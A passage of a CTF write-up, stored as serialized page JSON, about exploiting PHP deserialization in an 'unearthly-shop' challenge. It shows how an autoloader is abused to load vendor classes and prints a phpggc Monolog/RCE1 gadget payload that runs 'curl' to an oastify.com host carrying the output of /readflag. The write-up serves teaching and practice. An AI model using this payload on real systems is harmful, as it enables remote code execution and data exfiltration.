32,"tag":99,"props":2430,"children":2431},{"class":101,"line":122},[2432,2437,2441,2445,2449,2454,2459,2463,2468,2472],{"type":32,"tag":99,"props":2433,"children":2434},{"style":284},[2435],{"type":38,"value":2436},"        $",{"type":32,"tag":99,"props":2438,"children":2439},{"style":545},[2440],{"type":38,"value":2050},{"type":32,"tag":99,"props":2442,"children":2443},{"style":284},[2444],{"type":38,"value":1228},{"type":32,"tag":99,"props":2446,"children":2447},{"style":295},[2448],{"type":38,"value":746},{"type":32,"tag":99,"props":2450,"children":2451},{"style":301},[2452],{"type":38,"value":2453},"controllers/",{"type":32,"tag":99,"props":2455,"children":2456},{"style":284},[2457],{"type":38,"value":2458},"${",{"type":32,"tag":99,"props":2460,"children":2461},{"style":301},[2462],{"type":38,"value":2050},{"type":32,"tag":99,"props":2464,"children":2465},{"style":284},[2466],{"type":38,"value":2467},"}",{"type":32,"tag":99,"props":2469,"children":2470},{"style":295},[2471],{"type":38,"value":402},{"type":32,"tag":99,"props":2473,"children":2474},{"style":284},[2475],{"type":38,"value":1832},{"type":32,"tag":99,"props":2477,"children":2478},{"class":101,"line":137},[2479,2484,2489,2493,2497,2501,2505,2510,2514,2518,2522,2526,2530,2534],{"type":32,"tag":99,"props":2480,"children":2481},{"style":284},[2482],{"type":38,"value":2483},"    }",{"type":32,"tag":99,"props":2485,"children":2486},{"style":126},[2487],{"type":38,"value":2488}," elseif",{"type":32,"tag":99,"props":2490,"children":2491},{"style":284},[2492],{"type":38,"value":2378},{"type":32,"tag":99,"props":2494,"children":2495},{"style":704},[2496],{"type":38,"value":2383},{"type":32,"tag":99,"props":2498,"children":2499},{"style":284},[2500],{"type":38,"value":374},{"type":32,"tag":99,"props":2502,"children":2503},{"style":295},[2504],{"type":38,"value":2392},{"type":32,"tag":99,"props":2506,"children":2507},{"style":2395},[2508],{"type":38,"value":2509},"Model",{"type":32,"tag":99,"props":2511,"children":2512},{"style":339},[2513],{"type":38,"value":2024},{"type":32,"tag":99,"props":2515,"children":2516},{"style":295},[2517],{"type":38,"value":2407},{"type":32,"tag":99,"props":2519,"children":2520},{"style":284},[2521],{"type":38,"value":620},{"type":32,"tag":99,"props":2523,"children":2524},{"style":284},[2525],{"type":38,"value":573},{"type":32,"tag":99,"props":2527,"children":2528},{"style":545},[2529],{"type":38,"value":2050},{"type":32,"tag":99,"props":2531,"children":2532},{"style":284},[2533],{"type":38,"value":2424},{"type":32,"tag":99,"props":2535,"children":2536},{"style":284},[2537],{"type":38,"value":720},{"type":32,"tag":99,"props":2539,"children":2540},{"class":101,"line":147},[2541,2545,2549,2553,2557,2562,2566,2570,2574,2578],{"type":32,"tag":99,"props":2542,"children":2543},{"style":284},[2544],{"type":38,"value":2436},{"type":32,"tag":99,"props":2546,"children":2547},{"style":545},[2548],{"type":38,"value":2050},{"type":32,"tag":99,"props":2550,"children":2551},{"style":284},[2552],{"type":38,"value":1228},{"type":32,"tag":99,"props":2554,"children":2555},{"style":295},[2556],{"type":38,"value":746},{"type":32,"tag":99,"props":2558,"children":2559},{"style":301},[2560],{"type":38,"value":2561},"models/",{"type":32,"tag":99,"props":2563,"children":2564},{"style":284},[2565],{"type":38,"value":2458},{"type":32,"tag":99,"props":2567,"children":2568},{"style":301},[2569],{"type":38,"value":2050},{"type":32,"tag":99,"props":2571,"children":2572},{"style":284},[2573],{"type":38,"value":2467},{"type":32,"tag":99,"props":2575,"children":2576},{"style":295},[2577],{"type":38,"value":402},{"type":32,"tag":99,"props":2579,"children":2580},{"style":284},[2581],{"type":38,"value":1832},{"type":32,"tag":99,"props":2583,"children":2584},{"class":101,"line":156},[2585,2589,2593,2597,2601,2605,2609,2614,2618,2622,2626,2630,2634],{"type":32,"tag":99,"props":2586,"children":2587},{"style":284},[2588],{"type":38,"value":2483},{"type":32,"tag":99,"props":2590,"children":2591},{"style":126},[2592],{"type":38,"value":2488},{"type":32,"tag":99,"props":2594,"children":2595},{"style":284},[2596],{"type":38,"value":2378},{"type":32,"tag":99,"props":2598,"children":2599},{"style":704},[2600],{"type":38,"value":2383},{"type":32,"tag":99,"props":2602,"children":2603},{"style":284},[2604],{"type":38,"value":374},{"type":32,"tag":99,"props":2606,"children":2607},{"style":295},[2608],{"type":38,"value":2392},{"type":32,"tag":99,"props":2610,"children":2611},{"style":2395},[2612],{"type":38,"value":2613},"_",{"type":32,"tag":99,"props":2615,"children":2616},{"style":295},[2617],{"type":38,"value":2407},{"type":32,"tag":99,"props":2619,"children":2620},{"style":284},[2621],{"type":38,"value":620},{"type":32,"tag":99,"props":2623,"children":2624},{"style":284},[2625],{"type":38,"value":573},{"type":32,"tag":99,"props":2627,"children":2628},{"style":545},[2629],{"type":38,"value":2050},{"type":32,"tag":99,"props":2631,"children":2632},{"style":284},[2633],{"type":38,"value":2424},{"type":32,"tag":99,"props":2635,"children":2636},{"style":284},[2637],{"type":38,"value":720},{"type":32,"tag":99,"props":2639,"children":2640},{"class":101,"line":170},[2641,2645,2649,2653,2658,2662,2666,2670,2674,2678,2682,2687,2691,2695,2699,2703],{"type":32,"tag":99,"props":2642,"children":2643},{"style":284},[2644],{"type":38,"value":2436},{"type":32,"tag":99,"props":2646,"children":2647},{"style":545},[2648],{"type":38,"value":2050},{"type":32,"tag":99,"props":2650,"children":2651},{"style":284},[2652],{"type":38,"value":1228},{"type":32,"tag":99,"props":2654,"children":2655},{"style":704},[2656],{"type":38,"value":2657}," preg_replace",{"type":32,"tag":99,"props":2659,"children":2660},{"style":284},[2661],{"type":38,"value":374},{"type":32,"tag":99,"props":2663,"children":2664},{"style":295},[2665],{"type":38,"value":2392},{"type":32,"tag":99,"props":2667,"children":2668},{"style":2395},[2669],{"type":38,"value":2613},{"type":32,"tag":99,"props":2671,"children":2672},{"style":295},[2673],{"type":38,"value":2407},{"type":32,"tag":99,"props":2675,"children":2676},{"style":284},[2677],{"type":38,"value":620},{"type":32,"tag":99,"props":2679,"children":2680},{"style":295},[2681],{"type":38,"value":2064},{"type":32,"tag":99,"props":2683,"children":2684},{"style":301},[2685],{"type":38,"value":2686},"/",{"type":32,"tag":99,"props":2688,"children":2689},{"style":295},[2690],{"type":38,"value":606},{"type":32,"tag":99,"props":2692,"children":2693},{"style":284},[2694],{"type":38,"value":620},{"type":32,"tag":99,"props":2696,"children":2697},{"style":284},[2698],{"type":38,"value":573},{"type":32,"tag":99,"props":2700,"children":2701},{"style":545},[2702],{"type":38,"value":2050},{"type":32,"tag":99,"props":2704,"children":2705},{"style":284},[2706],{"type":38,"value":385},{"type":32,"tag":99,"props":2708,"children":2709},{"class":101,"line":183},[2710],{"type":32,"tag":99,"props":2711,"children":2712},{"style":284},[2713],{"type":38,"value":1092},{"type":32,"tag":99,"props":2715,"children":2716},{"class":101,"line":196},[2717],{"type":32,"tag":99,"props":2718,"children":2719},{"emptyLinePlaceholder":141},[2720],{"type":38,"value":144},{"type":32,"tag":99,"props":2722,"children":2723},{"class":101,"line":204},[2724,2728,2733,2737,2741,2745,2749,2753,2757,2762,2766],{"type":32,"tag":99,"props":2725,"children":2726},{"style":284},[2727],{"type":38,"value":1771},{"type":32,"tag":99,"props":2729,"children":2730},{"style":545},[2731],{"type":38,"value":2732},"filename",{"type":32,"tag":99,"props":2734,"children":2735},{"style":284},[2736],{"type":38,"value":1228},{"type":32,"tag":99,"props":2738,"children":2739},{"style":295},[2740],{"type":38,"value":746},{"type":32,"tag":99,"props":2742,"children":2743},{"style":301},[2744],{"type":38,"value":2686},{"type":32,"tag":99,"props":2746,"children":2747},{"style":284},[2748],{"type":38,"value":2458},{"type":32,"tag":99,"props":2750,"children":2751},{"style":301},[2752],{"type":38,"value":2050},{"type":32,"tag":99,"props":2754,"children":2755},{"style":284},[2756],{"type":38,"value":2467},{"type":32,"tag":99,"props":2758,"children":2759},{"style":301},[2760],{"type":38,"value":2761},".php",{"type":32,"tag":99,"props":2763,"children":2764},{"style":295},[2765],{"type":38,"value":402},{"type":32,"tag":99,"props":2767,"children":2768},{"style":284},[2769],{"type":38,"value":1832},{"type":32,"tag":99,"props":2771,"children":2772},{"class":101,"line":213},[2773],{"type":32,"tag":99,"props":2774,"children":2775},{"emptyLinePlaceholder":141},[2776],{"type":38,"value":144},{"type":32,"tag":99,"props":2778,"children":2779},{"class":101,"line":226},[2780,2784,2788,2793,2797,2801,2805],{"type":32,"tag":99,"props":2781,"children":2782},{"style":126},[2783],{"type":38,"value":2373},{"type":32,"tag":99,"props":2785,"children":2786},{"style":284},[2787],{"type":38,"value":2378},{"type":32,"tag":99,"props":2789,"children":2790},{"style":704},[2791],{"type":38,"value":2792},"file_exists",{"type":32,"tag":99,"props":2794,"children":2795},{"style":284},[2796],{"type":38,"value":542},{"type":32,"tag":99,"props":2798,"children":2799},{"style":545},[2800],{"type":38,"value":2732},{"type":32,"tag":99,"props":2802,"children":2803},{"style":284},[2804],{"type":38,"value":2424},{"type":32,"tag":99,"props":2806,"children":2807},{"style":284},[2808],{"type":38,"value":720},{"type":32,"tag":99,"props":2810,"children":2811},{"class":101,"line":234},[2812,2817,2821,2825],{"type":32,"tag":99,"props":2813,"children":2814},{"style":126},[2815],{"type":38,"value":2816},"        require",{"type":32,"tag":99,"props":2818,"children":2819},{"style":284},[2820],{"type":38,"value":573},{"type":32,"tag":99,"props":2822,"children":2823},{"style":545},[2824],{"type":38,"value":2732},{"type":32,"tag":99,"props":2826,"children":2827},{"style":284},[2828],{"type":38,"value":1832},{"type":32,"tag":99,"props":2830,"children":2831},{"class":101,"line":243},[2832],{"type":32,"tag":99,"props":2833,"children":2834},{"style":284},[2835],{"type":38,"value":1092},{"type":32,"tag":99,"props":2837,"children":2838},{"class":101,"line":256},[2839,2844,2848,2852,2856,2861,2866,2870,2874,2878],{"type":32,"tag":99,"props":2840,"children":2841},{"style":126},[2842],{"type":38,"value":2843},"    elseif",{"type":32,"tag":99,"props":2845,"children":2846},{"style":284},[2847],{"type":38,"value":2378},{"type":32,"tag":99,"props":2849,"children":2850},{"style":704},[2851],{"type":38,"value":2792},{"type":32,"tag":99,"props":2853,"children":2854},{"style":284},[2855],{"type":38,"value":374},{"type":32,"tag":99,"props":2857,"children":2858},{"style":126},[2859],{"type":38,"value":2860},"__DIR__",{"type":32,"tag":99,"props":2862,"children":2863},{"style":339},[2864],{"type":38,"value":2865}," .",{"type":32,"tag":99,"props":2867,"children":2868},{"style":284},[2869],{"type":38,"value":573},{"type":32,"tag":99,"props":2871,"children":2872},{"style":545},[2873],{"type":38,"value":2732},{"type":32,"tag":99,"props":2875,"children":2876},{"style":284},[2877],{"type":38,"value":2424},{"type":32,"tag":99,"props":2879,"children":2880},{"style":284},[2881],{"type":38,"value":720},{"type":32,"tag":99,"props":2883,"children":2885},{"class":101,"line":2884},16,[2886,2890,2895,2899,2903,2907],{"type":32,"tag":99,"props":2887,"children":2888},{"style":126},[2889],{"type":38,"value":2816},{"type":32,"tag":99,"props":2891,"children":2892},{"style":126},[2893],{"type":38,"value":2894}," __DIR__",{"type":32,"tag":99,"props":2896,"children":2897},{"style":339},[2898],{"type":38,"value":2865},{"type":32,"tag":99,"props":2900,"children":2901},{"style":284},[2902],{"type":38,"value":573},{"type":32,"tag":99,"props":2904,"children":2905},{"style":545},[2906],{"type":38,"value":2732},{"type":32,"tag":99,"props":2908,"children":2909},{"style":284},[2910],{"type":38,"value":1832},{"type":32,"tag":99,"props":2912,"children":2914},{"class":101,"line":2913},17,[2915],{"type":32,"tag":99,"props":2916,"children":2917},{"style":284},[2918],{"type":38,"value":1092},{"type":32,"tag":99,"props":2920,"children":2922},{"class":101,"line":2921},18,[2923],{"type":32,"tag":99,"props":2924,"children":2925},{"style":284},[2926],{"type":38,"value":2927},"});\n",{"type":32,"tag":47,"props":2929,"children":2930},{},[2931],{"type":38,"value":2932},"Our goal here will be to pollute this function in order to allow loading the file /www/frontend/vendor/autoload.php. Because /www/frontend/vendor/autoload.php will load all the classes from the frontend vendor folder.",{"type":32,"tag":47,"props":2934,"children":2935},{},[2936],{"type":38,"value":2937},"For this, we need to create a serialized string that meets the expectations of the function. If our serialized string loads a class, it will go through this function.",{"type":32,"tag":47,"props":2939,"children":2940},{},[2941],{"type":38,"value":2942},"We can see that this function performs preg_replace, when adding the character '_' and replaces it with a '/'.",{"type":32,"tag":85,"props":2944,"children":2945},{"land":510},[2946],{"type":32,"tag":90,"props":2947,"children":2949},{"code":2948,"language":510,"meta":7,"className":515,"style":7},"elseif (preg_match('/_/', $name)) {\n  $name = preg_replace('/_/', '/', $name);\n}\n",[2950],{"type":32,"tag":63,"props":2951,"children":2952},{"__ignoreMap":7},[2953,3005,3073],{"type":32,"tag":99,"props":2954,"children":2955},{"class":101,"line":102},[2956,2961,2965,2969,2973,2977,2981,2985,2989,2993,2997,3001],{"type":32,"tag":99,"props":2957,"children":2958},{"style":126},[2959],{"type":38,"value":2960},"elseif",{"type":32,"tag":99,"props":2962,"children":2963},{"style":284},[2964],{"type":38,"value":2378},{"type":32,"tag":99,"props":2966,"children":2967},{"style":704},[2968],{"type":38,"value":2383},{"type":32,"tag":99,"props":2970,"children":2971},{"style":284},[2972],{"type":38,"value":374},{"type":32,"tag":99,"props":2974,"children":2975},{"style":295},[2976],{"type":38,"value":2392},{"type":32,"tag":99,"props":2978,"children":2979},{"style":2395},[2980],{"type":38,"value":2613},{"type":32,"tag":99,"props":2982,"children":2983},{"style":295},[2984],{"type":38,"value":2407},{"type":32,"tag":99,"props":2986,"children":2987},{"style":284},[2988],{"type":38,"value":620},{"type":32,"tag":99,"props":2990,"children":2991},{"style":284},[2992],{"type":38,"value":573},{"type":32,"tag":99,"props":2994,"children":2995},{"style":545},[2996],{"type":38,"value":2050},{"type":32,"tag":99,"props":2998,"children":2999},{"style":284},[3000],{"type":38,"value":2424},{"type":32,"tag":99,"props":3002,"children":3003},{"style":284},[3004],{"type":38,"value":720},{"type":32,"tag":99,"props":3006,"children":3007},{"class":101,"line":112},[3008,3013,3017,3021,3025,3029,3033,3037,3041,3045,3049,3053,3057,3061,3065,3069],{"type":32,"tag":99,"props":3009,"children":3010},{"style":284},[3011],{"type":38,"value":3012},"  $",{"type":32,"tag":99,"props":3014,"children":3015},{"style":545},[3016],{"type":38,"value":2050},{"type":32,"tag":99,"props":3018,"children":3019},{"style":284},[3020],{"type":38,"value":1228},{"type":32,"tag":99,"props":3022,"children":3023},{"style":704},[3024],{"type":38,"value":2657},{"type":32,"tag":99,"props":3026,"children":3027},{"style":284},[3028],{"type":38,"value":374},{"type":32,"tag":99,"props":3030,"children":3031},{"style":295},[3032],{"type":38,"value":2392},{"type":32,"tag":99,"props":3034,"children":3035},{"style":2395},[3036],{"type":38,"value":2613},{"type":32,"tag":99,"props":3038,"children":3039},{"style":295},[3040],{"type":38,"value":2407},{"type":32,"tag":99,"props":3042,"children":3043},{"style":284},[3044],{"type":38,"value":620},{"type":32,"tag":99,"props":3046,"children":3047},{"style":295},[3048],{"type":38,"value":2064},{"type":32,"tag":99,"props":3050,"children":3051},{"style":301},[3052],{"type":38,"value":2686},{"type":32,"tag":99,"props":3054,"children":3055},{"style":295},[3056],{"type":38,"value":606},{"type":32,"tag":99,"props":3058,"children":3059},{"style":284},[3060],{"type":38,"value":620},{"type":32,"tag":99,"props":3062,"children":3063},{"style":284},[3064],{"type":38,"value":573},{"type":32,"tag":99,"props":3066,"children":3067},{"style":545},[3068],{"type":38,"value":2050},{"type":32,"tag":99,"props":3070,"children":3071},{"style":284},[3072],{"type":38,"value":385},{"type":32,"tag":99,"props":3074,"children":3075},{"class":101,"line":122},[3076],{"type":32,"tag":99,"props":3077,"children":3078},{"style":284},[3079],{"type":38,"value":423},{"type":32,"tag":47,"props":3081,"children":3082},{},[3083],{"type":38,"value":3084},"And then this function adds a / at the beginning of the file name.",{"type":32,"tag":85,"props":3086,"children":3087},{"land":510},[3088],{"type":32,"tag":90,"props":3089,"children":3091},{"code":3090,"language":510,"meta":7,"className":515,"style":7},"$filename = \"/${name}.php\";\n",[3092],{"type":32,"tag":63,"props":3093,"children":3094},{"__ignoreMap":7},[3095],{"type":32,"tag":99,"props":3096,"children":3097},{"class":101,"line":102},[3098,3102,3106,3110,3114,3118,3122,3126,3130,3134,3138],{"type":32,"tag":99,"props":3099,"children":3100},{"style":284},[3101],{"type":38,"value":2024},{"type":32,"tag":99,"props":3103,"children":3104},{"style":545},[3105],{"type":38,"value":2732},{"type":32,"tag":99,"props":3107,"children":3108},{"style":284},[3109],{"type":38,"value":1228},{"type":32,"tag":99,"props":3111,"children":3112},{"style":295},[3113],{"type":38,"value":746},{"type":32,"tag":99,"props":3115,"children":3116},{"style":301},[3117],{"type":38,"value":2686},{"type":32,"tag":99,"props":3119,"children":3120},{"style":284},[3121],{"type":38,"value":2458},{"type":32,"tag":99,"props":3123,"children":3124},{"style":301},[3125],{"type":38,"value":2050},{"type":32,"tag":99,"props":3127,"children":3128},{"style":284},[3129],{"type":38,"value":2467},{"type":32,"tag":99,"props":3131,"children":3132},{"style":301},[3133],{"type":38,"value":2761},{"type":32,"tag":99,"props":3135,"children":3136},{"style":295},[3137],{"type":38,"value":402},{"type":32,"tag":99,"props":3139,"children":3140},{"style":284},[3141],{"type":38,"value":1832},{"type":32,"tag":47,"props":3143,"children":3144},{},[3145],{"type":38,"value":3146},"So if we pass this string:",{"type":32,"tag":85,"props":3148,"children":3149},{},[3150],{"type":32,"tag":90,"props":3151,"children":3153},{"code":3152},"www_frontend_vendor_autoload\n",[3154],{"type":32,"tag":63,"props":3155,"children":3156},{"__ignoreMap":7},[3157],{"type":38,"value":3152},{"type":32,"tag":47,"props":3159,"children":3160},{},[3161],{"type":38,"value":3162},"The function will change our string to this:",{"type":32,"tag":85,"props":3164,"children":3165},{},[3166],{"type":32,"tag":90,"props":3167,"children":3169},{"code":3168},"/www/frontend/vendor/autoload\n",[3170],{"type":32,"tag":63,"props":3171,"children":3172},{"__ignoreMap":7},[3173],{"type":38,"value":3168},{"type":32,"tag":47,"props":3175,"children":3176},{},[3177],{"type":38,"value":3178},"We add a var_dump before the require, and after the unserialize, for debugging purposes.",{"type":32,"tag":47,"props":3180,"children":3181},{},[3182],{"type":38,"value":3183},"We sumbit this serialized string:",{"type":32,"tag":85,"props":3185,"children":3186},{},[3187],{"type":32,"tag":90,"props":3188,"children":3190},{"code":3189},"O:28:\"www_frontend_vendor_autoload\":0:{}\n",[3191],{"type":32,"tag":63,"props":3192,"children":3193},{"__ignoreMap":7},[3194],{"type":38,"value":3189},{"type":32,"tag":47,"props":3196,"children":3197},{},[3198,3200],{"type":38,"value":3199},"We can see this output when we submit the login form:\n",{"type":32,"tag":466,"props":3201,"children":3203},{"width":468,"src":3202},"https://user-images.githubusercontent.com/28403617/227588741-a9c20422-e49d-41f1-ae03-485ef75179af.png",[],{"type":32,"tag":47,"props":3205,"children":3206},{},[3207],{"type":32,"tag":1992,"props":3208,"children":3209},{},[3210],{"type":38,"value":3211},"What is the __PHP_Incomplete_Class object ?",{"type":32,"tag":47,"props":3213,"children":3214},{},[3215],{"type":38,"value":3216},"The unserialize tries to load the class with name \"www_frontend_vendor_autoload\", but it doesn't exist. So he go to the spl_autoload_register function.\nAnd replace all '_' by '/' and adds a / at the beginning of the string.\nThen it include the file /www/frontend/vendor/autoload.php. But the class with the name www_frontend_vendor_autoload still not exists.",{"type":32,"tag":47,"props":3218,"children":3219},{},[3220],{"type":38,"value":3221},"So it's because we have __PHP_Incomplete_Class object when we try to print the deserialized class. This __PHP_Incomplete_Class do not stop the execution of the script, so we can add many more element in the serialized string it will be executed.",{"type":32,"tag":40,"props":3223,"children":3225},{"id":3224},"php-gadgets-part-2",[3226],{"type":38,"value":3227},"PHP Gadgets part 2",{"type":32,"tag":47,"props":3229,"children":3230},{},[3231],{"type":38,"value":3232},"Now we are certain that the autoload file from frontend is loaded, we know that the frontend vendor directory is now accessible via the backend folder. Now we have all the elements to craft our final payload with phpggc that will execute commands during deserialization.",{"type":32,"tag":47,"props":3234,"children":3235},{},[3236],{"type":38,"value":3237},"We need to have an array containing two elements:",{"type":32,"tag":47,"props":3239,"children":3240},{},[3241],{"type":38,"value":3242},"The first of which will include the autoload.php script.",{"type":32,"tag":85,"props":3244,"children":3245},{},[3246],{"type":32,"tag":90,"props":3247,"children":3248},{"code":3189},[3249],{"type":32,"tag":63,"props":3250,"children":3251},{"__ignoreMap":7},[3252],{"type":38,"value":3189},{"type":32,"tag":47,"props":3254,"children":3255},{},[3256,3258,3263],{"type":38,"value":3257},"The second it's our phpggc payload. From ",{"type":32,"tag":1992,"props":3259,"children":3260},{},[3261],{"type":38,"value":3262},"Monolog/RCE1",{"type":38,"value":3264}," gadget.",{"type":32,"tag":85,"props":3266,"children":3267},{},[3268],{"type":32,"tag":90,"props":3269,"children":3271},{"code":3270},"O:32:\"MonologHandlerSyslogUdpHandler\":1:{s:6:\"socket\";O:29:\"MonologHandlerBufferHandler\":7:{s:7:\"handler\";r:4;s:10:\"bufferSize\";i:-1;s:6:\"buffer\";a:1:{i:0;a:2:{i:0;s:62:\"curl e8nxzx9mnynbf74h1hcofv6i0964uvik.oastify.com/$(/readflag)\";s:5:\"level\";N;}}s:5:\"level\";N;s:11:\"initialized\";b:1;s:11:\"bufferLimit\";i:-1;s:10:\"processors\";a:2:{i:0;s:7:\"current\";i:1;s:6:\"system\";}}}\n",[3272],{"type":32,"tag":63,"props":3273,"children":3274},{"__ignoreMap":7},[3275],{"type":38,"value":3270},{"type":32,"tag":47,"props":3277,"children":3278},{},[3279],{"type":38,"value":3280},"When we assemble these two elements, we get this payload:",{"type":32,"tag":85,"props":3282,"children":3283},{},[3284],{"type":32,"tag":90,"props":3285,"children":3287},{"code":3286},"a:2:{i:0;O:28:\\\"www_frontend_vendor_autoload\\\":0:{}i:1;O:32:\\\"Monolog\\\\Handler\\\\SyslogUdpHandler\\\":1:{s:6:\\\"socket\\\";O:29:\\\"Monolog\\\\Handler\\\\BufferHandler\\\":7:{s:7:\\\"handler\\\";r:4;s:10:\\\"bufferSize\\\";i:-1;s:6:\\\"buffer\\\";a:1:{i:0;a:2:{i:0;s:62:\\\"curl e8nxzx9mnynbf74h1hcofv6i0964uvik.oastify.com/$(/readflag)\\\";s:5:\\\"level\\\";N;}}s:5:\\\"level\\\";N;s:11:\\\"initialized\\\";b:1;s:11:\\\"bufferLimit\\\";i:-1;s:10:\\\"processors\\\";a:2:{i:0;s:7:\\\"current\\\";i:1;s:6:\\\"system\\\";}}}}\n",[3288],{"type":32,"tag":63,"props":3289,"children":3290},{"__ignoreMap":7},[3291],{"type":38,"value":3286},{"type":32,"tag":47,"props":3293,"children":3294},{},[3295],{"type":38,"value":3296},"We submit this payload to modify the access field of the user admin, and we perform the login to execute our payload from deserialization. And voila, we have the flag.",{"type":32,"tag":3298,"props":3299,"children":3301},"custom-image",{"imgSrc":3300},"https://user-images.githubusercontent.com/28403617/227621371-87fe5a93-c01c-4b9a-b7ec-dbb152d5a8c5.png",[],{"type":32,"tag":3303,"props":3304,"children":3305},"style",{},[3306],{"type":38,"value":3307},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}",{"title":7,"searchDepth":112,"depth":102,"links":3309},[3310,3311,3312,3313,3314,3315,3316],{"id":42,"depth":112,"text":45},{"id":426,"depth":112,"text":429},{"id":473,"depth":112,"text":476},{"id":1252,"depth":112,"text":1255},{"id":2235,"depth":112,"text":2238},{"id":2266,"depth":112,"text":2269},{"id":3224,"depth":112,"text":3227},"markdown","content:writeups:unearthly-shop.md","content","writeups/unearthly-shop.md","writeups/unearthly-shop","md",1749027224672]